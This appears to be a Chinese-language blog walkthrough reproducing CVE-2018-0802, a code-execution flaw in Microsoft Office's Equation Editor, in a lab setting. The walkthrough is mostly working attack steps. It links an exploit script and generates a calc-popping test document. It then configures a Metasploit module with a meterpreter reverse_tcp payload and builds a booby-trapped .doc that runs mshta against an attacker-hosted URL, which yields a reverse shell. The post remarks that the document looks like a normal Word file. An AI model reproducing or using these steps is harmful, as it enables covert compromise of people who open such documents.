CVE-2018-0802漏洞复现

Microsoft Office命令执行

【原理】

该漏洞由于office公式编辑器组件EQNEDT32.EXE,对字体名的长度没有进行长度检验,导致攻击者可以通过构造恶意的字体名,执行任意代码。

【工具】

  • Office
  • Python
  • kali

【步骤】

win7 ip :172.28.168.194

kali ip: 172.28.168.195

1.点击启动场景按钮,等待场景启动完成后,通过靶标接入协议进入漏洞标靶

2.检查是否存在漏洞

下载脚本:https://gitee.com/Harveysn0w/cve-2018-0802

输入下面的命令:

cd Documents/RTF_11882_0802 //进入exp文件夹
python RTF_11882_0802.py -c "cmd.exe /c calc.exe" -o calc.doc //生成测试文件
image-20210222215554527

双击打开calc.doc,如果弹出计算器说明存在漏洞:

image-20210222214857215

3.漏洞利用

首先需要下载PS_shell.rb,将它放到msf路径下

mv PS_shell.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
image-20210222222217351
image-20210222222244032

当然如果你的路径和我不一样,可以用locate自己找一下

接着就是启动msf。

image-20210222222354206

利用msf生成的脚本

use exploits/windows/smb/PS_shell
set payload windows/meterpreter/reverse_tcp
show options
set lhost 172.28.168.195     //kali的ip
set LPORT 4444
set uripath 123
exploit
image-20210222222926675
image-20210225194041629

生成病毒文件:

python RTF_11882_0802.py -c "mshta http://192.168.119.129:8080/235" -o new.doc
image-20210222223109836

在靶机上打开new.doc,打开之后就是普通word文档的样子,看不出什么异常:

image-20210222223230663

打开之后,kali成功收到反弹shell。

image-20210222223831270
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇